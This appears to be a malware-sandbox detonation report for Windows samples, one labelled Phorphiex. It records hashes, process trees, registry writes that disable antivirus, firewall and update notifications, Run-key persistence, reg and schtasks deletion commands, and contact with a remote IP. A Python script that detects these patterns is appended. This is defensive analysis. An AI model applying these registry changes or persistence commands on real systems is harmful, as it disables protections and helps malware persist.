| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
memory/2036-55-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1355410489.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1704-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1704-63-0x000000013FFD0000-0x000000013FFD6000-memory.dmp
memory/1704-64-0x000007FEFB771000-0x000007FEFB773000-memory.dmp
memory/1536-65-0x0000000000000000-mapping.dmp
memory/1948-66-0x0000000000000000-mapping.dmp
memory/1920-67-0x0000000000000000-mapping.dmp
memory/1044-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\118228510.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\118228510.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1276-70-0x0000000000000000-mapping.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
97s
Max time network
134s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96052E01-3F0D-11ED-A20B-4279513DF160} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121285" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96068D91-3F0D-11ED-A20B-4279513DF160} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
"C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe"
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:644 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1696-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/980-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{96068D91-3F0D-11ED-A20B-4279513DF160}.dat
| MD5 | 96c98723c7aa7f082c53406472ee60c4 |
| SHA1 | c5b8fe2a619c05caeff1f2516510b855893e4536 |
| SHA256 | 621604816aab9a1c83b17904469719af2a9f94ef23387a6e2e6c484b1af510fb |
| SHA512 | 5d7b62adb59ebcbd99583d5f7c0815a758d6e03feabd69d2bee8bd18d4dd4b0584af59117a72f3fdd2587e3c210f492cab280fc85e37acd3595fcf0b9dd757e3 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{96052E01-3F0D-11ED-A20B-4279513DF160}.dat
| MD5 | f17f992d9d6cc3f8f9605385025c427c |
| SHA1 | 9333b3bcb069a9ccb5c87c7d126839e86fa76fe4 |
| SHA256 | 7a11c4676706939b35c1d2daf042ab2fd9189641ce4a0f4e6dc7f06005dddea7 |
| SHA512 | 8844007510cbc5182a5162ef9bc2c137265f878cc820fd6583af3099ec5e2cfeb4e0753f9910a7fd9b22792200afd7479e5e32e41ca4e5260f9c244c45d2c19a |
memory/1696-62-0x00000000000F0000-0x000000000014D000-memory.dmp
memory/1696-63-0x00000000000F0000-0x000000000014D000-memory.dmp
memory/980-64-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1696-61-0x0000000000340000-0x0000000000361000-memory.dmp
memory/980-65-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1696-66-0x00000000000F0000-0x000000000014D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\T0NUVL6M.txt
| MD5 | db3eae449bd214077434096b2775e3af |
| SHA1 | 17ddd62a034415a9d8d2ad77dc665aaafa04191b |
| SHA256 | 9576274ea60d5472a94e8b46d47250480bc358fdf346c5c541bb779b42ee2aa5 |
| SHA512 | 4cca37cecfc9146078e54ed2cd54979e57d6f2ebecacc0209f6208981b8ce568530e88abbbb7e058c7d66b55e3309c04042603ac7d854f49862559b6d22e58f9 |
Analysis: behavioral9
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207527470.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysfgdrvs.exe" | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
| File opened for modification | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
"C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe"
C:\Windows\sysfgdrvs.exe
C:\Windows\sysfgdrvs.exe
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\207527470.exe
C:\Users\Admin\AppData\Local\Temp\207527470.exe
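The behavioral9 signatures and process tree above show three behaviours worth turning into host detections: the dropped C:\Windows\sysfgdrvs.exe setting every Security Center Override/DisableNotify flag to 1, a "Windows Settings" Run value that points at an executable sitting directly in the Windows root, and reg/schtasks calls that remove an older "User Configuration" persistence entry before the new one is installed. The following is an added detection example and is not part of the sandbox report: it evaluates Sysmon-style registry (Event ID 13) and process-creation (Event ID 1) events against those three patterns. The field names (EventID, Image, TargetObject, Details, CommandLine), the %WINDIR%-root heuristic and the sample events are assumptions; the indicator values inside the sample events are taken from the tables above.

```python
import re
from collections import defaultdict

# Security Center values the dropped C:\Windows\*.exe sets to 1 in the tables
# above. Sysmon writes DWORD data as "DWORD (0x00000001)", the sandbox as "1";
# both spellings are accepted below.
SECURITY_CENTER_FLAGS = frozenset(s.lower() for s in (
    "AntiVirusOverride", "AntiVirusDisableNotify", "AntiSpywareOverride",
    "FirewallOverride", "FirewallDisableNotify",
    "UpdatesOverride", "UpdatesDisableNotify",
))
SECURITY_CENTER_RE = re.compile(r"\\Microsoft\\Security Center\\([A-Za-z]+)$", re.I)
RUN_VALUE_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)
WINDIR_ROOT_RE = re.compile(r"^[a-z]:\\windows$", re.I)
# The reg/schtasks commands the sample runs to remove an older variant's
# "User Configuration" persistence before installing its own.
CLEANUP_RE = re.compile(
    r'reg\s+delete\s+"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"\s+/v\s+"User Configuration"'
    r'|schtasks\s+/delete\s+/f\s+/tn\s+"User Configuration"', re.I)


def _dword_is_one(details):
    d = details.strip().strip('"')
    m = re.fullmatch(r"DWORD \(0x([0-9a-fA-F]{8})\)", d)
    if m:
        return int(m.group(1), 16) == 1
    return d.isdigit() and int(d) == 1


def _image_from_run_value(details):
    """Extract the executable path from a Run value (quoted or bare), with the
    doubled backslashes the sandbox prints collapsed to single ones."""
    d = details.strip().replace("\\\\", "\\")
    if d.startswith('"'):
        return d[1:].split('"', 1)[0]
    return d.split(None, 1)[0] if d else ""


def _dirname(path):
    return path.rsplit("\\", 1)[0] if "\\" in path else ""


def evaluate(events):
    """Return (rule, image, indicator) triples for every matching event.

    Events are dicts with Sysmon-style fields (assumed names): EventID 13
    carries TargetObject/Details, EventID 1 carries CommandLine.
    """
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        if ev.get("EventID") == 13:
            target, details = ev.get("TargetObject", ""), ev.get("Details", "")
            m = SECURITY_CENTER_RE.search(target)
            if m and m.group(1).lower() in SECURITY_CENTER_FLAGS and _dword_is_one(details):
                findings.append(("security_center_override", image, target))
            elif RUN_VALUE_RE.search(target):
                # Heuristic: a Run entry pointing at an EXE that sits directly in
                # %WINDIR% (not System32) is how all three drops above persist.
                if WINDIR_ROOT_RE.match(_dirname(_image_from_run_value(details))):
                    findings.append(("run_value_in_windir_root", image, details))
        elif ev.get("EventID") == 1 and CLEANUP_RE.search(ev.get("CommandLine", "")):
            findings.append(("old_persistence_cleanup", image, ev["CommandLine"]))
    return findings


def rules_per_image(findings):
    """Group rule names by the process image that triggered them."""
    grouped = defaultdict(set)
    for rule, image, _ in findings:
        grouped[image].add(rule)
    return dict(grouped)


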